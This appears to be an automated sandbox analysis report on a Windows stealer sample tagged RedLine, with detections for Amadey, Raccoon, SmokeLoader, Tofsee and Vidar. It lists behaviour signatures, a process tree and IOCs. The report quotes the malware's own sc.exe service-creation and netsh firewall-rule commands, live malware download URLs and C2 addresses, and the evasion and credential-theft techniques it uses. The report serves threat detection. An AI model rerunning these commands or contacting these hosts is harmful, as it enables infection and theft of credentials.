Windows Analysis Report 0Cjy7Lkv1A.exe

Overview

General Information

Sample Name: 0Cjy7Lkv1A.exe
Analysis ID: 552945
MD5: eb023c854d3c8a24589e9294fd5d346e
SHA1: 699eb8e25fcd583774381b9ff554c7e8442c8c43
SHA256: b602afd3f94c5820291f8319b23f20e5254212ba6aab49be0238d7067caca7b8
Tags: exe, RedLineStealer

Detection

Amadey Raccoon RedLine SmokeLoader Tofsee Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Amadey's stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Yara detected BatToExe compiled binary
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Social media urls found in memory data
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapter information
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 0Cjy7Lkv1A.exe (PID: 4440 cmdline: "C:\Users\user\Desktop\0Cjy7Lkv1A.exe" MD5: EB023C854D3C8A24589E9294FD5D346E)
    • 0Cjy7Lkv1A.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\0Cjy7Lkv1A.exe" MD5: EB023C854D3C8A24589E9294FD5D346E)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 60C2.exe (PID: 6188 cmdline: C:\Users\user\AppData\Local\Temp\60C2.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 2784 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • 7063.exe (PID: 7052 cmdline: C:\Users\user\AppData\Local\Temp\7063.exe MD5: 3754DB9964B0177B6E905999B6F18FD7)
        • A8FB.exe (PID: 4692 cmdline: C:\Users\user\AppData\Local\Temp\A8FB.exe MD5: 2650E6FA017E57264E55CB0078639A13)
          • cmd.exe (PID: 7092 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uuqefjyt\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3496 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 3220 cmdline: C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5324 cmdline: C:\Windows\System32\sc.exe" description uuqefjyt "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 2192 cmdline: "C:\Windows\System32\sc.exe" start uuqefjyt MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 4388 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • B3BA.exe (PID: 6964 cmdline: C:\Users\user\AppData\Local\Temp\B3BA.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • B3BA.exe (PID: 4264 cmdline: C:\Users\user\AppData\Local\Temp\B3BA.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • B3BA.exe (PID: 1756 cmdline: C:\Users\user\AppData\Local\Temp\B3BA.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • 1BCC.exe (PID: 6684 cmdline: C:\Users\user\AppData\Local\Temp\1BCC.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • 382E.exe (PID: 6140 cmdline: C:\Users\user\AppData\Local\Temp\382E.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
        • 5126.exe (PID: 6132 cmdline: C:\Users\user\AppData\Local\Temp\5126.exe MD5: 6E7430832C1C24C2BF8BE746F2FE583C)
          • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6492 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1520 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • ujhcrda (PID: 5724 cmdline: C:\Users\user\AppData\Roaming\ujhcrda MD5: EB023C854D3C8A24589E9294FD5D346E)
    • ujhcrda (PID: 5416 cmdline: C:\Users\user\AppData\Roaming\ujhcrda MD5: EB023C854D3C8A24589E9294FD5D346E)
  • svchost.exe (PID: 4192 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5668 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6188 -ip 6188 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 3252 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • szdcdkt.exe (PID: 2972 cmdline: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d"C:\Users\user\AppData\Local\Temp\A8FB.exe" MD5: F23C1D7C6806E4BFAA8ABAD7CCC77AC1)
    • svchost.exe (PID: 6780 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 1624 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • ujhcrda (PID: 6104 cmdline: C:\Users\user\AppData\Roaming\ujhcrda MD5: EB023C854D3C8A24589E9294FD5D346E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000024.00000003.507342269.0000000000690000.00000004.00000001.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000002F.00000003.564856564.00000000006B0000.00000004.00000001.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0000002C.00000002.748388079.0000000005114000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(31 further entries not included in this extract)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.0Cjy7Lkv1A.exe.4615a0.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
36.2.szdcdkt.exe.400000.0.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
39.2.svchost.exe.a50000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
1.2.0Cjy7Lkv1A.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
13.1.ujhcrda.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
(26 further entries not included in this extract)

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started, Author: David Burkett, Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d"C:\Users\user\AppData\Local\Temp\A8FB.exe", ParentImage: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe, ParentProcessId: 2972, ProcessCommandLine: svchost.exe, ProcessId: 6780
Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started, Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\A8FB.exe, ParentImage: C:\Users\user\AppData\Local\Temp\A8FB.exe, ParentProcessId: 4692, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\, ProcessId: 3496
Sigma detected: Suspicious Svchost Process
Source: Process started, Author: Florian Roth, Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d"C:\Users\user\AppData\Local\Temp\A8FB.exe", ParentImage: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe, ParentProcessId: 2972, ProcessCommandLine: svchost.exe, ProcessId: 6780
Sigma detected: Netsh Port or Application Allowed
Source: Process started, Author: Markus Neis, Sander Wiebing, Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\A8FB.exe, ParentImage: C:\Users\user\AppData\Local\Temp\A8FB.exe, ParentProcessId: 4692, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 4388
Sigma detected: New Service Creation
Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community, Data: Command: C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\A8FB.exe, ParentImage: C:\Users\user\AppData\Local\Temp\A8FB.exe, ParentProcessId: 4692, ProcessCommandLine: C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 3220

Jbx Signature Overview


AV Detection:

Yara detected Raccoon Stealer
Source: Yara match, File source: 0000002C.00000002.738735707.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000002C.00000003.564687179.0000000004E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000002C.00000002.629029283.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://185.7.214.171:8080/6.php, URL Reputation: Label: malware
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe, Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe, Avira: detection malicious, Label: HEUR/AGEN.1211353
Multi AV Scanner detection for submitted file
Source: 0Cjy7Lkv1A.exe, Virustotal: Detection: 37%
Source: 0Cjy7Lkv1A.exe, ReversingLabs: Detection: 53%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1BCC.exe, ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\382E.exe, Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\382E.exe, ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\60C2.exe, Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\60C2.exe, ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\6674.exe, ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\8008.exe, ReversingLabs: Detection: 63%
Machine Learning detection for sample
Source: 0Cjy7Lkv1A.exe, Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\8008.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9874.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\382E.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\szdcdkt.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\60C2.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8B25.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6674.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5126.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1BCC.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ujhcrda, Joe Sandbox ML: detected
Source: 17.3.7063.exe.4a0000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 36.2.szdcdkt.exe.400000.0.unpack, Avira: Label: BDS/Backdoor.Gen
Source: 36.2.szdcdkt.exe.670e50.1.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.7063.exe.480e50.1.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 36.3.szdcdkt.exe.690000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 36.2.szdcdkt.exe.eb0000.2.unpack, Avira: Label: BDS/Backdoor.Gen
Source: 19.2.A8FB.exe.550e50.1.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 39.2.svchost.exe.a50000.0.unpack, Avira: Label: BDS/Backdoor.Gen
Source: 19.3.A8FB.exe.570000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 19.2.A8FB.exe.400000.0.unpack, Avira: Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Code function: 17_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Code function: 17_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Code function: 17_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Code function: 17_2_00407190 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Code function: 17_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Unpacked PE file: 17.2.7063.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe, Unpacked PE file: 19.2.A8FB.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe, Unpacked PE file: 36.2.szdcdkt.exe.400000.0.unpack
Source: 0Cjy7Lkv1A.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\AppData\Local\Temp\60C2.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown, HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.6:49771 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49792 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.6:49863 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49865 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49879 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49883 version: TLS 1.2
Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 60C2.exe, 0000000E.00000002.521453643.0000000000413000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.454922843.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.520151138.0000000004F70000.00000002.00020000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb~Sihc source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.473871600.0000000004B27000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdbxSohi source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
Source: Binary string: C:\zoro\veme_81\vujiwoli76 gag\sipowatelunem36\locufiyazed.pdb source: 7063.exe, 00000011.00000000.468936962.0000000000413000.00000002.00020000.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdblS[ha source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbrSUhr source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
Source: Binary string: TC:\sejuyupe34\tehajogim\xabed.pdb source: A8FB.exe, 00000013.00000000.474529040.0000000000413000.00000002.00020000.sdmp, A8FB.exe, 00000013.00000002.499568832.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000002.510363795.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000000.499129380.0000000000413000.00000002.00020000.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
Source: Binary string: C:\gebofa\95.pdb source: 0Cjy7Lkv1A.exe, 00000000.00000002.361830402.0000000000414000.00000002.00020000.sdmp, 0Cjy7Lkv1A.exe, 00000000.00000000.353857119.0000000000414000.00000002.00020000.sdmp, ujhcrda, 0000000C.00000000.448285897.0000000000414000.00000002.00020000.sdmp, ujhcrda, 0000000C.00000002.459349671.0000000000414000.00000002.00020000.sdmp, ujhcrda, 0000000D.00000000.455076610.0000000000414000.00000002.00020000.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
Source: Binary string: C:\sejuyupe34\tehajogim\xabed.pdb source: A8FB.exe, 00000013.00000000.474529040.0000000000413000.00000002.00020000.sdmp, A8FB.exe, 00000013.00000002.499568832.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000002.510363795.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000000.499129380.0000000000413000.00000002.00020000.sdmp
Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 60C2.exe, 0000000E.00000002.521453643.0000000000413000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.454922843.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.520151138.0000000004F70000.00000002.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Code function: 17_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Code function: 17_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
